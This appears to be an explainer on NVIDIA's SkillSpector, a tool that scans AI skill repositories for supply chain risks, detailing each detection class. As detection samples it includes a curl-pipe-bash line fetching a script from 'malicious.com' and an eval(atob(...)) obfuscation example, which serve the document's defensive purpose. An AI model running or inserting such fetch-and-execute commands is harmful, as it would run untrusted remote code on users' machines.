What Supply Chain Vulnerabilities Does SkillSpector Detect? Complete Guide to SC1-SC6 and TR1-TR3

SkillSpector detects nine distinct classes of supply chain vulnerabilities, ranging from unpinned dependencies and typosquatting to obfuscated code and known CVEs, using a hybrid approach of static regex patterns, live OSV.dev queries, and hard-coded fallback tables.

NVIDIA's SkillSpector is an open-source security analyzer that inspects AI skill repositories for supply chain vulnerabilities before deployment. The tool implements a dedicated Supply Chain Analyzer in src/skillspector/nodes/analyzers/static_patterns_supply_chain.py that surfaces six core dependency risks (SC1–SC6) and three trigger-abuse patterns (TR1–TR3). By combining static analysis with real-time vulnerability database queries, SkillSpector identifies security flaws in dependency manifests, installation scripts, and skill definitions.

Dependency Manifest Vulnerabilities

The analyzer inspects requirements.txt, package.json, pyproject.toml, and other manifest files to detect four specific categories of dependency risks.

SC1: Unpinned and Poorly Specified Dependencies

Unpinned dependencies allow unexpected package updates that may introduce breaking changes or malicious code. SkillSpector flags any declaration that lacks an exact version pin, including open-ended ranges like package >= 1.2 or wildcard specifications like package == *.

In static_patterns_supply_chain.py, the SC1_PATTERNS regex list (lines 52–63) matches these patterns across dependency manifests:


# requirements.txt

flask
numpy>=1.18
pandas == *

When detected, the analyzer generates a LOW severity finding with confidence 0.6, identifying the specific line and package name that lacks version constraints.

SC4: Known Vulnerable Dependencies

SkillSpector queries the OSV.dev database to identify packages with published CVEs. The implementation uses query_batch in osv_client.py (lines 61–66) to perform live lookups for every extracted dependency. If the service is unreachable or returns no results, the analyzer falls back to static tables _FALLBACK_VULNERABLE_PYPI and _FALLBACK_VULNERABLE_NPM (lines 106–134 in static_patterns_supply_chain.py).

For a vulnerable urllib3 declaration:

[project]
dependencies = ["urllib3<2.0"]

The tool reports: Known Vulnerable Dependency: urllib3==1.26.5 — CVE-2021-33503 (ReDoS) with CRITICAL or HIGH severity based on OSV severity ratings.

SC5: Abandoned and Unmaintained Packages

Dependencies that no longer receive security updates pose long-term risks. The analyzer maintains a hard-coded set _ABANDONED_PACKAGES (lines 140–182) containing unmaintained packages like pycrypto and request.

When scanning detects these packages, it generates a MEDIUM severity finding noting that the package is unmaintained and unlikely to receive future security patches.

SC6: Typosquatting Detection

Malicious actors often publish packages with names similar to popular libraries (e.g., reqeusts instead of requests). SkillSpector detects these using the _is_typosquat function (lines 91–114), which calculates Levenshtein distance via _edit_distance (lines 75–88) against lists of popular packages (_POPULAR_PYPI and _POPULAR_NPM, lines 188–238).

For a typosquatted dependency:

reqeusts==2.25.1

The analyzer reports: Possible Typosquatting: 'reqeusts' resembles popular package 'requests' with HIGH severity and 0.7 confidence.

Code Execution and Integrity Risks

Beyond dependency manifests, SkillSpector analyzes source files for patterns indicating immediate code execution or obfuscation.

SC2: External Script Fetching

The tool detects dangerous curl-pipe-bash patterns and similar constructs that download and immediately execute remote scripts. The SC2_PATTERNS regex list (lines 65–78) matches commands like curl … | bash and wget … | sudo bash.

A helper function _is_safe_supply_chain_pattern checks for trusted domains before raising confidence. For untrusted domains:

curl https://malicious.com/install.sh | bash

SkillSpector generates a HIGH severity finding with 0.9 confidence, flagging the external script execution risk.

SC3: Obfuscated Code

Malicious payloads often hide behind base64 encoding, hex strings, or dynamic evaluation. The SC3_PATTERNS list (lines 80–97) captures obfuscation primitives including eval, atob, new Function, marshal, and hex-encoded strings.

For JavaScript code like:

eval(atob("ZnVuY3Rpb24gYWJjKCl7IHJldHVybiAiSGVsbG8iOyB9"));

The analyzer reports HIGH severity obfuscated code with 0.95 confidence, highlighting the specific deobfuscation technique detected.

Trigger Abuse Patterns

SkillSpector analyzes SKILL.md manifest files for trigger definitions that could lead to unintended activation or command shadowing.

TR1: Overly Broad Triggers

Single-word triggers like "help" or "the" activate in unintended contexts. The analyzer checks against _OVERLY_BROAD_SINGLE_WORDS (lines 75–98) and applies length thresholds in _analyze_triggers. These generate LOW severity findings.

TR2: Shadow Commands

When a trigger name matches built-in system commands (e.g., "install", "run"), it shadows the native functionality. The analyzer consults _BUILTIN_COMMANDS (lines 21–73) during trigger analysis and reports MEDIUM severity conflicts.

TR3: Keyword Baiting

Generic bait phrases designed to match almost any user input are flagged by regex patterns in baiting_patterns (lines 124–130). These MEDIUM severity findings identify triggers like "anything" that attempt to capture all user interactions.

Implementation Architecture

The analysis orchestrates through the node() function (lines 545–583) in static_patterns_supply_chain.py, which coordinates three distinct analysis phases:

  1. Static Pattern Matching: SC1–SC3 patterns execute via static_runner.run_static_patterns against all source files
  2. Dependency Analysis: _analyze_dependencies (lines 558–748) extracts package names from manifests, queries OSV.dev via _sc4_from_osv (lines 661–708), checks abandoned packages, and runs typosquatting detection
  3. Trigger Analysis: _analyze_triggers (lines 554–645) validates trigger definitions against built-in commands and baiting patterns

All findings convert to the SARIF-compatible Finding model defined in src/skillspector/models.py and route through the analysis pipeline.

Summary

SkillSpector's supply chain analyzer provides comprehensive coverage of dependency and execution risks through:

  • Static regex patterns for unpinned dependencies, external scripts, and obfuscated code
  • Live OSV.dev integration with static fallback tables for known CVEs
  • Hard-coded knowledge bases for abandoned packages, popular package names, and typosquatting detection
  • Trigger validation against built-in commands and overly broad patterns
  • Severity scoring ranging from LOW (unpinned deps) to CRITICAL (known CVEs) based on exploitability and impact

Frequently Asked Questions

What file types does SkillSpector analyze for supply chain vulnerabilities?

SkillSpector analyzes standard dependency manifests including requirements.txt, pyproject.toml, package.json, Cargo.toml, and similar configuration files. The tool also inspects shell scripts and source code files for external script fetching (SC2) and obfuscation (SC3) patterns, plus SKILL.md files for trigger abuse (TR1–TR3).

How does SkillSpector handle offline environments without OSV.dev access?

When the OSV.dev service is unreachable, SkillSpector falls back to static vulnerability tables _FALLBACK_VULNERABLE_PYPI and _FALLBACK_VULNERABLE_NPM embedded in static_patterns_supply_chain.py (lines 106–134). This ensures that known vulnerable dependencies still receive CRITICAL or HIGH severity findings even without network connectivity, though the live database provides more comprehensive coverage.

Can SkillSpector detect typosquatting in private package repositories?

The current implementation focuses on public package ecosystems (PyPI and npm) using hard-coded popular package lists (_POPULAR_PYPI and _POPULAR_NPM). While the Levenshtein distance algorithm in _is_typosquat (lines 91–114) could theoretically apply to private registries, the built-in popularity lists specifically target public packages known to be frequently typosquatted.

What is the difference between SC2 and SC3 severity levels?

SC2 (External Script Fetching) and SC3 (Obfuscated Code) both generate HIGH severity findings, but for different risk profiles. SC2 identifies immediate remote code execution via pipe-to-shell commands, while SC3 flags hidden payloads that may execute malicious logic through deobfuscation. SC2 confidence varies based on domain trust checks via _is_safe_supply_chain_pattern, whereas SC3 maintains consistently high confidence (0.95) due to clear obfuscation indicators.

Have a question about this repo?

These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:

Share the following with your agent to get started:
curl -s "https://instagit.com/install.md"

Works with
Claude Codex Cursor VS Code OpenClaw Any MCP Client

Maintain an open-source project? Get it listed too →